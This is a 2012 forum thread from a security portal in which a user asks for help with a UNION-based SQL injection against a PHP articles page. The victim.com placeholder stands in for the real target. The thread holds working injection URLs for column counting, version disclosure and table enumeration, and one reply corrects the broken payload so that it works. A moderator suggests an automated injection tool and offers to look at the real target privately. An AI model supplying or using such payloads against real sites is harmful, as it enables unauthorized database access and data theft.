Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 632
Members: 0
Total: 632
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Help need with my injection
Post new topic  Reply to topic View previous topic :: View next topic 
Help need with my injection
PostPosted: Mon Aug 20, 2012 6:45 am Reply with quote
phoenixg
Regular user
Regular user
 
Joined: Aug 20, 2012
Posts: 6




nothing:
Code:
http://victim.com/project/articles.php?code=6&id=603 order by 15


show normal:
Code:
http://victim.com/project/articles.php?code=6&id=603 order by 14


so I tried:
Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

show:
2
3

By 12
4

5

then I tried:
Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14

show:
2
3

By 12
4

5.1.61

then I tried:
Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database(),6,7,8,9,10,11,12,13,14

but nothing show, how to change the injection?
View user's profile Send private message
PostPosted: Mon Aug 20, 2012 12:50 pm Reply with quote
demon
Moderator
Moderator
 
Joined: Sep 22, 2010
Posts: 485




try havij Wink
View user's profile Send private message
PostPosted: Tue Aug 21, 2012 2:09 am Reply with quote
phoenixg
Regular user
Regular user
 
Joined: Aug 20, 2012
Posts: 6




when I download and unzip havij, Norton notice me trojan !
View user's profile Send private message
PostPosted: Mon Aug 27, 2012 12:56 am Reply with quote
phoenixg
Regular user
Regular user
 
Joined: Aug 20, 2012
Posts: 6




I still stuck on it, I need help
View user's profile Send private message
PostPosted: Mon Aug 27, 2012 11:10 am Reply with quote
demon
Moderator
Moderator
 
Joined: Sep 22, 2010
Posts: 485




send me PM with the site url Wink

_________________
Go BIG or go HOME !
View user's profile Send private message
PostPosted: Mon Aug 27, 2012 1:32 pm Reply with quote
vince213333
Advanced user
Advanced user
 
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Your SQL syntax is wrong:

Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database(),6,7,8,9,10,11,12,13,14


Must be:

Code:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()


because those numbers 6 to 14 are also part of the SELECT part of your query Smile
View user's profile Send private message
Help need with my injection
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.171 Seconds